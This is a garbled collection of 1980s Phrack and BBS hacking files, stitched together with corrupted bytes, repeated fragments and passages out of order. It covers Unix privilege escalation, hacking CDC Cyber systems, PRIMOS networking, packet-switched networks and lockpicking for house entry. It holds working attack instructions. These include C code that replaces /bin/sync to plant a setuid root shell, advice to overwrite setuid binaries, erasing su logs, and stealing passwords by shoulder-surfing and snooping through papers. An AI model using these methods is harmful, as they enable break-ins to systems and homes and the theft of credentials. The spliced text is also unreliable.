hell. Security: (Improving your*s.) -Whenever logging onto a system, you should always do the following: $ who -u $ ps -ef $ ps -u root or bsd: $ who; w; ps uaxg This prints out who is on, who is active, what is going on presently, everything in the background, and so on. And the ever popular: $ find / -name "*log*" -print This lists out all the files with the name 'log' in it. If you do find a process that is logging what you do, or an odd log file, change ZL it as soon as you can. If you think someone may be looking at you and you don't want to leave (Useful for school computers) then go into something that allows shell breaks, or use redirection to your advantage: $ cat < /etc/passwd That puts 'cat' on the ps, not 'cat /etc/passwd'. If you're running a setuid process, and don't want it to show up on a ps (Not a very nice thing to have happen), then: $ super_shell # exec sh Runs the setuid shellU] (super_shell) and puts something 'over' it. You may also want to run 'sh' again if you are nervous, because if you break out of an exec'ed process, you die. Neat, huh? Improving your id: -First on, you should issue the command 'id' & it will tell you you your uid and euid. (bsd: whoami; >/tmp/xxxx;ls -l /tmp/xxxx will tell you your id [whoami] and your euid [ls -l].), terribly useful for checking on setuid programs to see if you have root euid privs. Also, do this: $ find / -perm -4000 -exec /bin/ls -lad {} ";" Yes, this finds and does an extended list of all the files that have the setuid bit on them, like /bin/login, /bin/passwd, and so on. If any of them look nonstandard, play with them, you never can tell what a ^| will do to them sometimes. Also, if any are writeable and executable, copy sh over them, and you'll have a setuid root shell. Just be sure to copy whatever was there back, elsewise your stay wi Ill probably be shortened a bit. -What, you have the bin passwd? Well, game over. You have control of the system. Everything in the bin directory is owned by bin (with the exception of a few things), so you can modify them at will. Since cron executes a few programs as root every once in a while, such as /bin/sync, try this: main() { if (getuid()==0 || getuid()==0) { system("cp /bin/sh /tmp/sroot");  o system("chmod 4777 /tmp/sroot"); } sync(); } $ cc file.c $ cp /bin/sync /tmp/sync.old $ mv a.out /bin/sync $ rm file.c Now, as soon as cron runs /bin/sync, you'll have a setuid shell in /tmp/sroot. Feel free to hide it. -the 'at' & 'cron' commands: Look at the 'at' dir. Usually /usr/spool/cron/atjobs. If you can run 'at' (check by typing 'at'), and 'lasttimedone' is writable, then: submit a blank 'a t' job, edit 'lastimedone' to do what you want it to do, and move lasttimedone over your entry (like 88.00.00.00). Then the commands you put in lasttimedone will be ran as that file's owner. Cron: in /usr/spool/cron/cronjobs, there are a list of people running cron jobs. Cat root's, and see if he runs any of the programs owned by you (Without doing a su xxx -c "xxx"). For matter, check all the crons. If you can take one system login, you should be able to get th }zSe rest, in time. -The disk files. These are rather odd. If you have read permission on the disks in /dev, then you can read any file on the system. All you have to do is find it in there somewhere. If the disk is writeable, if you use /etc/fsbd, you can modify any file on the system into whatever you want, such as by changing the permissions on /bin/sh to 4555. Since this is pretty difficult to understand (and I don't get it fully), then I won't bother with it H u any more. -Trivial su. You know with su you can log into anyone elses account if you know their passwords or if you're root. There are still a number of system 5's that have uid 0, null passwd, rsh accounts on them. Just be sure to remove your entry in /usr/adm/sulog. -Trojan horses? On unix? Yes, but because of the shell variable PATH, we are generally out of luck, because it usually searches /bin and /usr/bin first. However, if the first field is a coloDn, files in the present directory are searched first. Which means if you put a modified version of 'ls' there, hey. If this isn't the case, you will have to try something more blatant, like putting it in a game (see Shooting Shark's file a while back). If you have a system login, you may be able to get something done like that. See cron. Taking over: Once you have root privs, you should read all the mail in /usr/mail, just to sure nothing interesting is up, or an imply type -cn and the / prompt and it would execute the catlist command. Now back to uprocs, you could easily write a whole BBS in a procedure file or say you wanted to run a chat system and you did not want people to change the password on your account, you could do this: .proc,chat, PW"Password: "=(*A). $ife,PW="cyber",yes. $chat. $revert. $bye. $else,yes. $note./Wrong password, try again/. $revert. $bye. $endif,yes. This procedure will ask the user for a passwTmord and if he doesn't type "cyber" he will be logged off. If he does get it right then he will be dumped into the chat program and as soon as he exits the chat program, he will be logged off. This way, the user cannot get into the batch subsystem and change your password or otherwise screw around with the account. The following is a listing of the procfil that I use on my local system, it has a lot of handy utilities and examples... ---- cut here ---- .PROC,B. .******BYE****** $e>DAYFILE. $NOTE.////////////////////////// $ASCII. $BYE. $REVERT,NOLIST. #EOR .PROC,TIME. .******GIVES DAY AND TIME****** $NOTE./THE CURRENT DAY AND TIME IS/ $FIND,CLOCK./ $REVERT,NOLIST. #EOR .PROC,SIGN*I,IN. .******SIGN PRINT UTILITY******. $GET,IN. $FIND,SIGN,#I=IN,#L=OUT. $NOTE./TO PRINT, TYPE: PRINT,OUT,CC,RPS=??/ $REVERT,NOLIST. #EOR .PROC,TA. .******TALK****** $SACFIND,AID,COMM. $REVERT,NOLIST. #EOR .PROC,DIR,UN=,FILE=. .******DIRECTORY LISTING OF PERMANENT FILES****** $GE`T(ZZZZDIR=CAT/#UN=1GTL0CL) ZZZZDIR(FILE,#UN=UN) $RETURN(ZZZZDIR) $REVERT,NOLIST. #EOR .PROC,Z19. .******SET SCREEN TO Z19****** $SCREEN,Z19. $NOTE./SCREEN,Z19. $REVERT,NOLIST. #EOR .PROC,VT. .******SET SCREEN TO VT100****** $SCREEN,VT100. $NOTE./SCREEN,VT100. $REVERT,NOLIST #EOR .PROC,SC. .******SET SCREEN TO T10****** $SCREEN,T10. $NOTE./SCREEN,T10. $REVERT,NOLIST #EOR .PROC,C. .******CATLIST****** $CATLIST. $REVERT,NOLIST. #EOR .PROC,CA. .******CATLIST,LO=F****** $CATLIST,LO=F-. $REVERT,NOLIST. #EOR .PROC,MT. .******BBS****** $SACFIND,AID,MTAB. $REVERT,NOLIST. #EOR .PROC,LI,FILE=. .******LIST FILE****** $GET,FILE. $ASCII. $COPY(FILE) $REVERT. $EXIT. $CSET(NORMAL) $REVERT,NOLIST. WHERE IS THAT FILE?? #EOR .PROC,LOCAL. .******DIRECTORY OF LOCAL FILES****** $RETURN(PROCLIB,YYYYBAD,YYYYPRC) $GET(QQQFILE=ENQF/UN=1GTL0CL) QQQFILE. $REVERT,NOLIST. $EXIT. $REVERT. FILES ERROR #EOR .PROC,RL. .******RAISE LIMITS****** $SETASL(*) $SETJSL(*) $SETTL(*) $CSET(ASCII)z $NOTE./ Limits now at max validated levels. $CSET(NORMAL) $REVERT,NOLIST. #EOR .PROC,CL. .******CLEAR****** $CLEAR,*. $CSET(ASCII) $NOTE./LOCAL FILE AREA CLEARED $REVERT,NOLIST. #EOR .PROC,P,FILE=THING,LST=LIST. .*********************************************************** $CLEAR. $GET(FILE) $PASCAL4,FILE,LST. $REVERT. $EXIT. $REWIND,*. $CSET(ASCII) $COPY(LIST) $CSET(NORMAL) $REVERT,NOLIST. #EOR .PROC,RE. .******REWIND****** $REWIND,*. $CSET(ASCII) $NOTE./REWOUND. $REVERT,NOLIST.W~ #EOR .PROC,FOR,FILE,LST=LIST. .******************************************************************** $CLEAR. $GET(FILE) $FTN5,I=FILE,L=LST. $REPLACE(LST=L) $CSET(ASCII) $REVERT. Fortran Compiled $EXIT. $REWIND,*. $COPY(LST) $REVERT. That's all folks. #EOR .PROC,WAR. .******WARBLES****** $SACFIND,AID,WAR. $REVERT,NOLIST. #EOR .PROC,M. .******MAIL/CHECK****** $MAIL/CHECK. $REVERT,NOLIST. #EOR .PROC,MA. .******ENTER MAIL****** $MAIL. $REVERT,NOLIST. #EOR .PROC,HE,FILE=SUMPROC,UN=. .*uV*****HELP FILE****** $GET,FILE/#UN=UN. $COPY(FILE) $REVERT. $EXIT. $REVERT,NOLIST. #EOR .PROC,DYNAMO. .******WHO KNOWS??****** $GET,DYNMEXP/UN=7ETPDOC. $SKIPR,DYNMEXP. $COPYBR,DYNMEXP,GO. $FIND,DYNAMO,GO. $REVERT,NOLIST. #EOR #EOR #EOI ---- cut here ---- I have covered procfil's fairly extensively as I think it is the most useful function of cyber for hackers. I will be realeasing source codes for several programs including 'the communicator' chat utility, and a BBS program with +2[fia full message base. If you have any questions about cyber or you have gotten into one and don't know what to do, I can be contacted at the Forgotten Realm BBS or via uucp mail at ...!uunet!ncoast!ghost. Phrozen Ghost =============================================================================== AID,WAR. $REVERT,NOLIST. #EOR .PROC,M. .******MAIL/CHECK****** $MAIL/CHECK. $REVERT,NOLIST. #EOR .PROC,MA. .******ENTER MAIL****** $MAIL. $REVERT,NOLIST. #EOR .PROC,HE,FILE=SUMPROC,UN=. .* ] [ DP ] |\| [\]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::[/] |/| D Call and Support: F |\| |\| I The Devil's Playground BBS A |/| |/| A (03) 338-4687 - 300/1200/2400/9600 S |\| |\| L Call Today Don't Delay! T |/| |/| Yq' |\| |\| Magical Hassan <- Special Thanx to: -> Forth Protocol |/| [/]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::[\] [ Source: The Archives of Magical Hassan - Usr #276 Devil's Playground BBS ] ==Phrack Inc.== Volume Two, Issue 18, Phile #6 of 7 ------------------------------------------------------------------------------  Z ^^^ ^^^ These can also be digits There are also special operator accounts which start with digits instead of numbers. (ie 7ETPDOC) These accounts can run programs such as the monitor which can observe any tty connected to the system... The next prompt will be for the password, student account passwords cannot be changed and are 7 random letters by default, other account passwords can be changed. You  get 3 tries until you are logged out. It is very difficult if not impossible to use a brute force hacker or try to guess someones account.. so how do you get on? Here's one easy way... Go down to your local college (make sure they have a cyber computer!) then just buy a class catalog (they only cost around 50 cents) or you could look, borrow, steal someone else's... then find a pascal or fortran class that fits your schedule! You will only have to attend the class 3 or 4 times max Y. Once you get there you should have no trouble, but if the instructor asks you questions about why you are not on the roll, just tell him that you are auditing the class (taking it without enrolling so it won't affect your GPA). The instructor will usually pass out accounts on the 3rd or 4th day of class.. this method also works well with just about any system they have on campus! Another way to get accounts is to go down to the computer lab and start snooping! Look over someon ?~d:es shoulder while they type in their password, or look thru someones papers while they're in the bathroom, or look thru the assistants desk while he is helping someone... (I have acquired accounts both ways, and the first way is alot easier with less hassles) Also, you can use commas instead of returns when entering username and password. Example: at the family prompt, you could type ,nadrajf,dsfgkcd or at the username prompt nadrajf,dsfgkcd After you enter  %Fyour info, the system will respond with: JSN: APXV, NAMIAF / The 'APXV, NAMIAF' could be different depending on what job you were attached to. The help program looks alot neater if you have vt100 emulation, if you do, type [screen,vt100] (don't type the brackets! from now on, all commands I refer to will be enclosed in brackets) Then type help for an extensive tutorial or a list of commands. Your best bet at this point is to buy a quick reference guide at the campus because I am on7rly going to describe the most useful commands. The / means you are in the batch subsystem, there are usually 6 or 7 other subsystems like basic, fortran, etc... return to batch mode by typing [batch]. Some usefull commands: CATLIST - will show permanant files in your directory. ENQUIRE,F - displays temporary files in your workspace. LIMITS - displays your priveledges. INFO - get more online help. R - re-execute last command. GET,fn -ڒC loads fn into the local file area. CHANGE - change certain specs on a file. PERMIT - allow other users to use one of your files. REWIND,* - rewinds all your local files. NEW,fn - creates new file. PURGE - deletes files. LIST,F=fn - list file. UPROC - create an auto-execute procedure file. MAIL - send/receive private mail. BYE - logoff. Use the [helpme,cmd] command for the exact syntax and parameters of these g commands. There are also several machine specific 'application' programs such as pascal, fortran, spitbol, millions of others that you can look up with the INFO command... there are also the text editors; edit, xedit, and fse (full screen editor). Xedit is the easiest to use if you are not at a Telray 1061 terminal and it has full documentation. Simply type [xedit,fn] to edit the file 'fn'. Special control characters used with Cyber: Control S and Control Q work normally, the termHbinate character is Control T followed by a carriage return. If you wanted to break out of an auto-execute login program, you would have to hit ^T C/R very fast and repetitively in order to break into the batch subsystem. Control Z is used to set environment variables and execute special low level commands, example: [^Z TM C/R] this will terminate your connection... So now you're thinking, what the hell is Cyber good for? Well, they won't have any phone company records, and you c+an't get credit information from one, and I am not going to tell you how to crash it since crashing systems is a sin. There are uses for a cyber though, one handy use is to set up a chat system, as there are normally 30-40 lines going into a large university cyber system. I have the source for a chat program called the communicator that I will be releasing soon. Another use is some kind of underground information exchange that people frequently set up on other systems, this can e=asily be done with Cyber. Procedure files: A procedure file is similiar to a batch file for MS-DOS, and a shell script for UNIX. You can make a procedure file auto-execute by using the UPROC command like [uproc,auto] will make the file 'auto', auto execute. There is also a special procedure file called the procfile in which any procedure may be accessed by simply a - in front of it. If your procfile read: .proc,cn. .* sample procedure $catlist/un=7etpdoc. $exit. then you could s ] [ DP ] |\| [\]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::[/] |/| D Call and Support: F |\| |\| I The Devil's Playground BBS A |/| |/| A (03) 338-4687 - 300/1200/2400/9600 S |\| |\| L Call Today Don't Delay! T |/| |/| Ol |\| |\| Magical Hassan <- Special Thanx to: -> Forth Protocol |/| [/]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::[\] [ Source: The Archives of Magical Hassan - Usr #276 Devil's Playground BBS ] ==Phrack Inc.== Volume Two, Issue 18, Phile #5 of 7 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -= Dcl^ =- -= Hacking Control Data Corporation's Cyber =- -= =- -= Written by Phrozen Ghost, April 23, 1988 =- -= =- -= Exclusively for Phrack Magazine =- -= ;\ =- -= Devil's Playground BBS =- -= =- -= Melbourne, Australia =- -= =- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- This article will cover getting into and using NOS (NetwozB@rking Operating System) version 2.5.2 running on a Cyber 730 computer. Cybers generally run this operating system so I will just refer to this environ- ment as Cyber. Also, Cyber is a slow and outdated operating system that is primarily used only for college campuses for running compilers. First off after you have scanned a bunch of carriers you will need to know how Cyber identifies itself. It goes like this: WELCOME TO THE NOS SOFTWARE SYSTEM. COPYRIGHT CONTROL DATA 1978, 1987.Wmh# 88/02/16. 02.36.53. N265100 CSUS CYBER 170-730. NOS 2.5.2-678/3. FAMILY: You would normally just hit return at the family prompt. Next prompt is: USER NAME: Usernames are in the format abcdxxx where a is the location of where the account is being used from (A-Z). the b is a grouping specifying privs and limits for the account- usually A-G -where A is the lowest access. Some examples of how they would be used in a college system: A = lowest access - =bclass accounts for students B = slightly higher than A (for students working on large projects) C = Much higher limits, these accounts are usually not too hard to get and they will normally last a long time! Lab assistants use these. D = Instructors, Lecturers, Professors.. etc.. E = same... (very hard to get these!) The C and D positions are usually constant according to the groupings. For example, a class would have accounts ranging from NADRAAA-AZZ !+M+$some "hands-on" experience. Look forward to seeing some beginner PRIMOS files in the near future. -MH] ------------------------------------------------------------------------------ Special thanks to PRIME INC. for unwittingly providing the text for this article. Please forward any mail to me at The Devil's Playground (03) 338-5687. ------------------------------------------------------------------------------ ========================================================================="9====== ditional software allowing 3277 terminal users to to reach programs on a IBM mainframe, even though the terminal subsystem is physically connected to a PRIME system, which is connected to an IBM system. [PRIMOS offers a variety of different Communication applications. Being able to utilize these applications to their fullest extent can make life easy for a Primos 'enthusiast'. If you're a beginner with Primos, te best way to learn more , as with any other system, is to get ãwq \\\ THAT WAS ALREADY \\\ (HERE.) \\\ \\\ \\\ NOW, TAKE YOUR PICK TO A GRINDER OR A FILE AND SMOOTH THE END (#1) UNTIL IT'S ROUNDED SO IT WON'T HANG INSIDE THE LOCK. TEST YOUR TOOL OUT ON DOORKNOBS AT YOUR HOUSE TO SEE IF IT WILL SLIDE IN AND OUT SMOOTHLY. NOW, THIS IS WHERE THE SCREWĝwDRIVER COMES IN. IS IT SMALL ENOUGH FOR IT AND YOUR PICK TO BE USED IN THE SAME LOCK AT THE SAME TIME, ONE ABOVE THE OTHER ? LETS HOPE SO, BECAUSE THAT'S THE ONLY WAY YOUR GONNA OPEN IT. IN THE COMING INSTRUCTIONS, PLEASE REFER TO THIS CHART OF THE INTERIOR OF A LOCK: XXXXXXXXXXXXXXXXXXXXXXX| K # # # # # # | E # # # # | Y * * | H * * * * * * | O | L | E XXXXXXXXXXXXXXXXXXXXXXX| #= e> UPPER TUMLER PIN *= LOWER TUMLER PIN X= CYLINDER WALL (THIS IS A GREATLY SIMPLIFIED DRAWING) THE OBJECT IS TO PRESS THE PIN UP SO THAT THE SPACE BETWEEN THE UPPER PIN AND THE LOWER PIN IS LEVEL WITH THE CYLINDER WALL. NOW, IF YOU PUSH A PIN UP, ITS TENDANCY IS TO FALL BACK DOWN, RIGHT ? THAT IS WHERE THE SCREWDRIVER COMES IN. INSERT THE SCREWDRIVER INTO THE SLOT AND TURN. THIS TENSION WILL KEEP THE "SOLVED" PINS FROM FALLING BACK DOWN. NOW, WORK FROM THE BACK OF THE LOCK TO THE FRzONT, AND WHEN YOU'RE THROUGH.....THERE WILL BE A CLICK, THE SCREWDRIVER WILL TURN FREELY, AND THE DOOR WILL OPEN. DON'T GET DISCOURAGE ON YOUR FIRST TRY! IT WILL PROBABLY TAKE YOU ABOUT 20-30 MINUTES YOUR FIRST TIME. AFTER THAT YOU WILL QUICKLY IMPROVE WITH PRACTICE. THIS IS BY NO MEANS THE MOST EFFICIENT WAY OF ENTERING A HOUSE. IF YOU WOULD LIKE ANOTHER ITEM OR TWO DEVOTED TO THESE OTHER WAYS, LET THE SYSOP KNOW. | L | E XXXXXXXXXXXXXXXXXXXXXXX| #=t tF THEY'RE UNLUCKY. IF YOU ARE LOOKING FOR EXTREMELY QUICK ACCESS, LOOK ELSEWHERE. THE FOLLOWING INSTRUCTIONS WILL PERTAIN MOSTLY TO THE "LOCK-IN-KNOB" TYPE LOCK, SINCE IT IS THE EASIEST TO PICK. IF THERE IS SUFFICIENT DEMAND, I WILL LATER WRITE A FILE DISCUSSING THE OTHER FORMS OF ENTRANCE, INCLUDING DEAD-BOLT FIRST OF ALL, YOU NEED A PICK SET. IF YOU KNOW A LOCKSMITH, GET HIM TO MAKE YOU A SET. THIS WILL BE THE BEST POSSIBLE SET FOR YOU TO USE. IF YOU FIND A LOCKSMITH WILLING TO S"2UPPLY A SET, DON'T GIVE UP HOPE. IT IS POSSIBLE TO MAKE YOUR OWN, IF YOU HAVE ACCESS TO A GRINDER (YOU CAN USE A FILE, BUT IT TAKES FOREVER.) THE THING YOU NEED IS AN ALLEN WRENCH SET (VERY SMALL). THESE SHOULD BE SMALL ENOUGH TO FIT INTO THE KEYHOLE SLOT. NOW, BEND THE LONG END OF THE ALLEN WRENCH AT A SLIGHT ANGLE..(NOT 90 DEG.) IT SHOULD LOOK SOMETHING LIKE THIS: #1 \\ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ (THIS IS THE HANDLE lications and a network which is truly available to all users without the expense of building a complicated private network of multiplexors and concentrators. By utilizing PRIMENET's File Access Manager (FAM), programs running under PRIMOS can access files on other PRIME systems using the same mechanisms used to access local files. This feature allows users to move from a single-system environment to a multiple-system one without difficulty. When a program and the files it uses areL\ separated into two (or more) systems the File Access Management (FAM)is automatically called upon whenever the program attempts to use the file. Remote file operations are logically transparent to the user or program. When a request to locate a file or directory cannot be satisfied locally, the File Access Manager is invoked to find the data elsewhere in the network. PRIMOS initiates a remote procedure call to the remote system and suspends the user. This procedure call is recei΍ved by an answering slave process on the remote system, which performs the requested operation and returns data via subroutine parameters. The slave process on the remote system is dedicated to its calling master process (user) on the local system until released. A master process (user) can have a slave process on each of several remote systems simultaneously. This means that each user has a dedicated connection for the duration of the remote access activity so many requests can be handled in parallel. FAM operation is independent of the specific network hardware connecting the nodes. There is no need to rewrite programs or learn new commands when moving to the network environment. Furthermore, the user need only be logged-in to one system in the network, regardless of the location of the file. Files on the local system or remote systems can be accessed dynamically by file name within a program, using the language-specific open and close statements. No exteF*d rnal job control language statements are needed for the program to access files. Inter-host file transfers and editing can be performed using the same PRIMOS utilities within the local system by referencing the remote files with their actual file names. REMOTE JOB ENTRY % ---------------- PRIME's Remote Job Entry (RJE) software enables a PRIME system to emulate IBM, CDC, Univac, Honeywell and ICL remote job entry termin_GLals over synchronous communication lines. PRIME's RJE provides the same communications and peripheral support as the RJE terminals they emulate, appearing to the host processor to be those terminals. All PRIME RJE products provide three unique benefits: * PRIME RJE is designed to communicate with multiple remote sites simultaneously. * PRIME RJE enables any terminal connected to a PRIME system to submit jobs for transmission to remote processors, Ǟeliminating the requirement for dedicated terminals or RJE stations at each location. * PRIME's mainframe capabilities permit concurrent running of RJE emulators, program development and production work. PRIME's RJE supports half-duplex, point-to-point, synchronous communications and operates over dial-up and dedicated lines. It is fully supported by the PRIMOS operating system. DISTRIBUTED PROCESSING TERMINAL EXECUT.IVE (DPTX) ------------------------------------------------ PRIME's Distributed Processing Terminal Executive (DPTX) allows users to construct communication networks with PRIME and IBM-compatible equipment. DPTX conforms to IBM 3271/3277 Display System protocols, and can be integrated into networks containing IBM mainframes, terminals and printers without changing application code or access methods and operates under the PRIMOS operating system. DPTX is compatgv8ible with all IBM 370 systems and a variety of access methods and teleprocessing monitors: BTAM, TCAM, VTAM, IMS/VS, CIC/VS, and TSO. They provide transmission speeds up to 9600 bps using IBM's Binary Synchronous Communications (BSC) protocol. DPTX is comprised of three software modules that allow PRIME systems to emulate and support IBM or IBM compatible 3271/3277 Display Systems. One module, Data Stream Compatibility (DPTX/DSC), allows the PRIME system to emulate the operation of a 3271 on the IBM system. This enables both terminal user and application programs (interactive or batch) on the PRIME System to reach application programs on an IBM mainframe. A second module, Terminal Support Facility (DPTX/TSF), allows a PRIME system to control a network of IBM 3271/3277 devices. This enables terminal users to reach application programs on a PRIME computer. The third module, Transparent Connect Facility (DPTX/TCF), combines the functions of modules one and two  )owith additional software allowing 3277 terminal users to to reach programs on a IBM mainframe, even though the terminal subsystem is physically connected to a PRIME system, which is connected to an IBM system. [PRIMOS offers a variety of different Communication applications. Being able to utilize these applications to their fullest extent can make life easy for a Primos 'enthusiast'. If you're a beginner with Primos, te best way to learn more , as with any other system, is to get  tw. The PRIMENET Node Controller is designed to assure continuity of operation in the event that one of the systems fails. One system can be removed from the network or restored to online status without disturbing the operations of the other system. An active node is unaware of messages destined for other nodes in the network, and the CPU is notified only when a message for that node has been correctly received. Synchronous communications over dedicated leased lines or dial-up li شfJnes is provided through the Multiple Data Link Controller (MDLC). This controller handles certain protocol formatting and data transfer functions normally performed by the operating system in other computers. The controller's microprogrammed architecture increases throughput by eliminating many tasks from central processor overhead. The communications controller also supports multiple protocols for packet-switched communications with Public Data Networks such as the United States'  TELENET and TYMNET, the Canadian DATAPAC, Great Britain's International Packet Switching Service (IPSS), France's TRANSPAC, and the European Packet Switching Network, EURONET. Most Public Data Networks require computers to use the CCITT X.25 protocol to deal with the management of virtual circuits between a system and others in the network. The synchronous communications controller supports this protocol. PRIME can provide the X.25 protocol for use with the PRIMENET networking software without modification to the existing hardware configuration. PRIMENET software offers three distinct sets of services. The Inter-Program Communication Facility (IPCF) lets programs running under the PRIMOS operating system establish communications paths (Virtual circuits) to programs in the same or another PRIME system, or in other vendors' systems supporting the CCITT X.25 standard for packet switching networks. The Interactive Terminal Support (ITS) facility permits termin/Րals attached to a packet switching network, or to another PRIME system, to log-in to a PRIME system with the same capabilities they would have if they were directly attached to the system. The File Access Manager (FAM) allows terminal users or programs running under the PRIMOS operating system to utilize files physically stored on other PRIME systems in a network. Remote file operations are logically transparent to the application program. This means no new applications and commands܁r need to be learned for network operation. The IPCF facility allows programs in a PRIME computer to exchange data with programs in the same computer, another PRIME computer, or another vendor's computer, assuming that that vendor supports X.25. This feature is the most flexible and powerful one that any network software package can provide. It basically allows an applications programmer to split up a program, so that different pieces of the program execute on different machines a0wR network. Each program component can be located close to the resource (terminals, data, special peripherals, etc.) it must handle, decode the various pieces and exchange data as needed, using whatever message formats the application designer deems appropriate. The programmer sees PRIMENET's IPCF as a series of pipes through which data can flow. The mechanics of how the data flows are invisible; it just "happens" when the appropriate services are requested. If the two programs happen gfto end up on the same machine, the IPCF mechanism still works. The IPCF offers the following advantages: 1) The User does not need to understand the detailed mechanisms of communications software in order to communicate. 2) Calls are device-independent. The same program will work over physical links implemented by the local node controller (local network), leased lines, or a packet network. 3) Proۢgrams on one system can concurrently communicate with programs on other systems using a single communications controller. PRIMENET handles all multiplexing of communications facilities. 4) A single program can establish multiple virtual circuits to other programs in the network. PRIMENET's ITS facility allows an interactive terminal to have access to any machine in the network. This means that terminals can be connected into4\ an X.25 packet network along with PRIME computers. Terminal traffic between two systems is multiplexed over the same physical facilities as inter-program data, so no additional hardware is needed to share terminals between systems. This feature is ordinarily invisible to user programs, which cannot distinguish data entering via a packet network from data coming in over AMLC lines. A variant of the IPCF facility allows users to include the terminal handling protocol code in their 4eown virtual space, thus enabling them to control multiple terminals on the packet network within one program. Terminals entering PRIMOS in this fashion do not pass through the usual log-in facility, but are immediately connected to the application program they request. (The application program provides whatever security checking is required.) The result is the most effective available means to provide multi-system access to a single terminal, with much lower costs for data commun~J_____________________________________________________________ Call.. The Forgotten Realm - (618)943-2399. Apply for access. The Freeworld II - (301)XXX-XXXX. Lunatic Labs Unltd. - (415)278-7421. The Outlet Private - (313)261-6141. newuser,kenwood The Central Office - (914)234-3260. DLDS - (305)395-6906. The Playground - +61 3 338-4687 Me~ =lbourne, Australia ffice/Forgotten Realm/TOP. I hope you enjoyed my file. Thanks for your time. I should be writing a follow up article to this one as soon as I can. Stay safe.. - Epsilon! _____________________________________________________________ - Thanks To - Prime Suspect/Sir Qix/The Technic/Empty Promise/The Leftist Uote network communication services for all PRIME systems. PRIME's Remote Job Entry (RJE) products enable multi-user PRIME systems to emulate IBM, CDC, Univac, Honeywell and ICL remote job entry terminals over synchronous communication lines. PRIME's Distributed Processing Terminal Executive (DPTX) allows users to construct communication networks with PRIME and IBM-compatible equipment. PRIMENET -------- PRIMENETB< provides complete local and remote network communication services for all PRIME systems. PRIMENET networking software lets a user or process on one PRIME system communicate with any other PRIME system in the network without concern for any protocol details. A user can log in to any computer in the network from any terminal in the network. With PRIMENET, networking software processes running concurrently on different systems can communicate interactively. PRIMENET allows transparent9 access to any system in the network without burdening the user with extra commands. PRIMENET has been designed and implemented so that user interface is simple and transparent. Running on a remote system from a local node of the network or accessing remote files requires no reprogramming of user applications or extensive user training. All the intricacies and communication protocols of the network are handled by the PRIMENET software. For both the local and remote networks, PRIME ZNET will allow users to share documents, files, and programs and use any disk or printer configured in the network. For a local network between physically adjacent systems, PRIME offers the high-performance microprocessor, the PRIMENET Node Controller (PNC). The controller users direct memory access for low overhead and allows loosely coupled nodes to share resources in an efficient manner. The PNCs for each system are connected to each other with a coaxial cable to form a high-sp )F;eed ring network, with up to 750 feet (230 meters) between any two systems. Any system in the PNC ring can establish virtual circuits with any other system, making PNC-based networks "fully connected" with a direct path between each pair of systems. The ring has sufficient bandwidth (1 MB per second) and addressing capability to accomodate over 200 systems in a ring structure; however, PRIMENET currently supports up to sixteen systems on a ring to operate as a single local networkt ] [ DP ] |\| [\]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::[/] |/| D Call and Support: F |\| |\| I The Devil's Playground BBS A |/| |/| A (03) 338-4687 - 300/1200/2400/9600 S |\| |\| L Call Today Don't Delay! T |/| |/| _@ |\| |\| Magical Hassan <- Special Thanx to: -> Forth Protocol |/| [/]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::[\] [ Source: The Archives of Magical Hassan - User #276 Devil's Playground BBS ] ==Phrack Inc.== Volume Two, Issue 18, Phile #4 of 7 ------------------------------------------------------------------------- - S - - - - PRIMOS: - - NETWORK COMMUNICATIONS - - - - PRIMENET, RJE, DPTX - - qw - - - - Presented by Magic Hasan June 1988 - ------------------------------------------------------------------------- PRIME's uniform operating system, PRIMOS, supports a wide range of communications products to suit any distributed processing need. The PRIMENET distributed networking facility provides complete local and rem~o^ '0' when using Telenet. _____________________________________________________________ Notes On Above Networks - Some countries may have more than one Packet Switching Network. The ones listed are the more significant networks for each country. For example, the United States has eleven public Packet Switching Networks, but the four I listed are the major ones. ~G Several countries may also share one network, as shown above. Each country will have equal access to the network using the basic POTS dialup ports. Focus On Telenet - Since Telenet is one of the most famous, and highly used PSNs in the United States, I thought that informing you of some of the more interesting aspects of this network would be beneficial. ~ֺ@ Interconnections With Other Network Types - Packet Switched Networks are not the only type of networks which connect a large capacity of hosts together. There are also Wide Area Networks, which operate on a continuous link basis, rather than a packet switched basis. These networks do not use the standardized X.25 protocol, and can only be reached by direct dial-ups,~ or by connecting to a host which has network access permissions. The point is, that if you wanted to reach, say, Arpanet from Telenet, you would have to have access to a host which is connected to both networks. This way, you can connect to the target host computer via Telenet, and use the WAN via the target host. WANs aren't the only other networks you can access. Also, connec~tions to other small, private, interoffice LANs are quite common and quite feasable. Connections To International NUAs via NUIs - When using an NUI, at the prompt, type 0+DNIC+NUA. After your connection is established, proceed to use the system you've reached. Private Data Networks - Within the large Packet Switched Networks that are accessible~2dui to us there are also smaller private networks. These networks can sometimes be very interesting as they may contain many different systems. A way to identify a private network is by looking at the three digit prefix. Most prefixes accessible by Telenet are based on area codes. Private networks often have a prefix that has nothing to do with any area code. (Ex. 322, 421, ~224, 144) Those prefixes are not real networks, just examples. Inside these private networks, there are often smaller networks which are connected with some type of host selector or gateway server. If you find something like this, there may be hosts that can be accessed only by this port selector/server, and not by the normal prefix. It is best to find out what these other add~Xresses translate to, incase you are not able to access the server for some reason. That way, you always have a backup method of reaching the target system (usually the addresses that are accessed by a gateway server/port selector translate to normal NUAs accessible from your Telenet port). When exploring a private network, keep in mind that since these networks are smaller, they would most lik~OVely be watched more closely during business hours then say Telenet or Tymenet. Try to keep your scanning and tinkering down to a minimum on business hours to avoid any unecessary trouble. Remember, things tend to last longer if you don't abuse the hell out of them. Summary - I hope this file helped you out a bit, and at least gave you a general idea of~϶ what PSNs are used for, and some of the advantages of using these networks. If you can find something interesting during your explorations of PSNs, or Private Data Networks, share it, and spread the knowledge around. Definately exploit what you've found, and use it to your advantage, but don't abuse it. If you have any questions or comments, you reach me on - The Fr~ сeeWorld II/Central Office/Forgotten Realm/TOP. I hope you enjoyed my file. Thanks for your time. I should be writing a follow up article to this one as soon as I can. Stay safe.. - Epsilon! 